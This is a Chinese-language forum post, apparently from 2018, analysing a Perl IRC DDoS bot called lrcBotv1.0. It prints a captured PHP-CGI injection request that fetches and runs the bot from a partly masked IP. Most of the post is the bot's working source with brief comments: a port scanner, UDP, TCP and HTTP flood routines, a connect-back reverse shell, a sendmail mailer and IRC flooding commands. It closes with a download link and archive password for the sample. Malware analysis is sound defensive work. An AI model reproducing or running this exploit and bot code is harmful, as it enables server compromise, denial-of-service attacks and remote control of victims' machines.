DDoS Perl lrcBotv1.0分析
0x10 对.cap分析
WireShark追踪流量包,发现异常如下:
POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 194
<? system("cd /tmp ; wget http://167.88.**.**/js/zmuie ; curl -O http://167.88.**.**/js/zmuie; fetch http://167.88.**.**/js/zmuie ; chmod +x zmuie ; ./zmuie ; perl zmuie; rm -rf zmuie* "); ?>
#系统打开tmp文件夹,通过wget/curl/fetch得到资源zmuie;给zmuie赋予可执行权限,编译,然后执行,最后删除
0x20 对.perl文件进行分析
1、端口扫描
###########端口扫描,对1到65533个端口进行扫描
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("1","7","9","14","20","21","22","23","25","53","80","88","110","112","113","137","143","145","222","333","405","443","444","445","512","587","616","666","993","995","1024","1025","1080","1144","1156","1222","1230","1337","1348","1628","1641","1720","1723","1763","1983","1984","1985","1987","1988","1990","1994","2005","2020","2121","2200","2222","2223","2345","2360","2500","2727","3130","3128","3137","3129","3303","3306","3333","3389","4000","4001","4471","4877","5252","5522","5553","5554","5642","5777","5800","5801","5900","5901","6062","6550","6522","6600","6622","6662","6665","6666","6667","6969","7000","7979","8008","8080","8081","8082","8181","8246","8443","8520","8787","8855","8880","8989","9855","9865","9997","9999","10000","10001","10010","10222","11170","11306","11444","12241","12312","14534","14568","15951","17272","19635","19906","19900","20000","21412","21443","21205","22022","30999","31336","31337","32768","33180","35651","36666","37998","41114","41215","44544","45055","45555","45678","51114","51247","51234","55066","55555","65114","65156","65120","65410","65500","65501","65523","65533");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [PortScan]� �9,1Scanning for open ports on �12".$1." �9,1started. �");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [PortScan]� �9,1Open ports found: �12@aberta �");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [PortScan]� �9,1No open ports found. �");
}
}
2、正则匹配文件目录
##############
if ($funcarg =~ /^download\s+(.*)\s+(.*)/) { ##通过正则匹配下载文件目录
getstore("$1", "$2");
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [Download]� �9,1Downloaded the file: �12$2 �9,1from �12$1 �"); ##文件位置
}
##############
if ($funcarg =~ /^dns\s+(.*)/){ #解析DNS
my $nsku = $1;
$mydns = inet_ntoa(inet_aton($nsku));
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [DNS]� �9,1Resolved: �12$nsku �9,1to �12$mydns �");
}
##############
if ($funcarg=~ /^port\s+(.*?)\s+(.*)/ ) { #尝试验证上述列出可用端口
my $hostip= "$1";
my $portsc= "$2";
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
if ($scansock) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [PORT]� �9,1Connection to �12$hostip�9,1:�12$portsc �9,1is �12Accepted. �");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [PORT]� �9,1Connection to �12$hostip�9,1:�12$portsc �9,1is �4Refused. �");
}
}
3、通过UDP-1进行DDos
if ($funcarg =~ /^udp1\s+(.*)\s+(\d+)\s+(\d+)/) { #通过UDP-1进行DDos
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17); #通过socket通信
my $alvo=inet_aton("$1");
my $porta = "$2";
my $dtime = "$3";
my $pacote;
my $pacotese;
my $size = 0;
my $fim = time + $dtime;
my $pacota = 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [UDP-1 DDOS]� �9,1Attacking �12".$1." �9,1On Port �12".$porta." �9,1for �12".$dtime." �9,1seconds. �");
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($dtime != "0"));
$pacote = $size ? $size : int(rand(1024-64)+64) ; #文件大小限制在1024个字节内
$porta = int(rand 65000) +1 if ($porta == "0");
#send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo));
send(Tr0x, pack("a$pacote","Tr0x"), 0, pack_sockaddr_in($porta, $alvo));
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [UDP-1 DDOS]� �9,1Attack for �12".$1." �9,1finished in �12".$dtime." �9,1seconds�9,1. �");
}
4、通过UDP-2进行DDos
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)/) { #通过UDP-2进行DDos
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [UDP-2 DDOS]� �9,1Attacking �12".$1." �9,1with �12".$2." �9,1Kb Packets for �12".$3." �9,1seconds. �");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); #udpflood使受攻击的机器访问速度变慢,大量资源被占用
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [UDP-2 DDOS]� �9,1Results �12".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." �9,1Kb in �12".$dtime." �9,1seconds to �12".$1."�9,1. �");
}
5、通过TCP进行DDos
if ($funcarg =~ /^tcp\s+(.*)\s+(\d+)\s+(\d+)/) { #TCP进行DDos
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [TCP DDOS]� �9,1Attacking �12".$1.":".$2." �9,1for �12".$3." �9,1seconds. �");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");#udpflood使受攻击的机器访问速度变慢,大量资源被占用
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :��4,1 [TCP DDOS]� �9,1Attack ended on: �12".$1.":".$2."�9,1. �");
}
6、通过HTTP协议DDos
if ($funcarg =~ /^http\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1[HTTP DDOS]� �9,1Attacking �12".$1." �9,1on port 80 for �12".$2." �9,1seconds. �");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [HTTP DDOS]� �9,1Attacking ended on: �12".$1."�9,1. �");
}
0x30 函数解析
1、getprotobyname
if ($funcarg =~ /^cback\s+(.*)\s+(\d+)/) { #通过getprotobyname()返回tcp信息获取主机的地址IP,端口
my $host = "$1";
my $port = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") { #判断操作系统是否匹配Win32,如果是则启动cmd.exe,并且通过socket通信
$shell = "cmd.exe";
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [ConnectBack]� �9,1Connecting to �12$host:$port �");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");#启动系统shell
close(STDIN);
close(STDOUT);
close(STDERR);
}
##############
if ($funcarg =~ /^mail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {#通过mail发送/usr/sbin/sendmail
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [Mailer]� �9,1Sending email to: �12$3 �");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [Mailer]� �9,1Email Sended to: �12$recipient �");
}
exit;
}
}
2、IRC拒绝服务式攻击
IRC网络上进行flood将用户与IRC服务器(拒绝服务的形式)断开连接的方法,耗尽带宽,导致网络延迟。
##############由于ctcp几乎在每个客户端都被实施,大多数用户对CTCP请求做出响应,通过发送太多请求,经过几个路由,他们将从IRC服务器断开连接。最广泛使用的类型是ping,CTCP。
if ($funcarg =~ /^ctcpflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [IRCFlood]� �9,1CTCP Flooding: �12".$target." �");
for (1..10) {
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001PING\001\n");
}
}
##############
#msgflood向受害者发送大量私人消息,造成资源占用和拥堵。
if ($funcarg =~ /^msgflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [IRCFlood]� �9,1MSG Flooding: �12".$target." �");
sendraw($IRC_cur_socket, "PRIVMSG ".$target." :�0,15.�..�1,16.�..�2,13.�..�3,12.�..�4,11.�..�5,10.�..�6,9.�..�7,8.�..��8,7.�..�9,6.�...��0,15.�..�1,16.�..�2,13.�..�3,12.�..�4,11.�..�5,10.�..�6,9.�..�7,8.�..��8,7.�..�9,6.�...��0,15.�..�1,16.�..�2,13.�..�3,12.�..�4,11.�..�5,10.�..�6,9.�..�7,8.�..��8,7.�..�9,6.�...��0,15.�..�1,16.�..�2,13.�..�3,12.�..�4,11.�..�5,10.�..�6,9.�..�7,8.�..�");
}
##############
#noticeflood与msgflood类似,使用notice命名造成资源占用拥堵
if ($funcarg =~ /^noticeflood (.*)/) {
my $target = "$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl :��4,1 [IRCFlood]� �9,1NOTICE Flooding: �12".$target." �");
for (1..2){
sendraw($IRC_cur_socket, "NOTICE ".$target." :�0,15.�..�1,16.�..�2,13.�..�3,12.�..�4,11.�..�5,10.�..�6,9.�..�7,8.�..��8,7.�..�9,6.�...��0,15.�..�1,16.�..�2,13.�..�3,12.�..�4,11.�..�5,10.�..�6,9.�..�7,8.�..��8,7.�..�9,6.�...��0,15.�..�1,16.�..�2,13.�..�3,12.�..�4,11.�..�5,10.�..�6,9.�..�7,8.�..��8,7.�..�9,6.�...��0,15.�..�1,16.�..�2,13.�..�3,12.�..�4,11.�..�5,10.�..�6,9.�..�7,8.�..�");
}
}
##############
0x40 相关下载
链接:https://pan.baidu.com/s/1pMZrT27 密码:08gy ,压缩包的提取密码:52pojie
程序不含木马,病毒,分析环境为Win7,建议在52虚拟机中运行。
发表于 2018-2-2 17:51
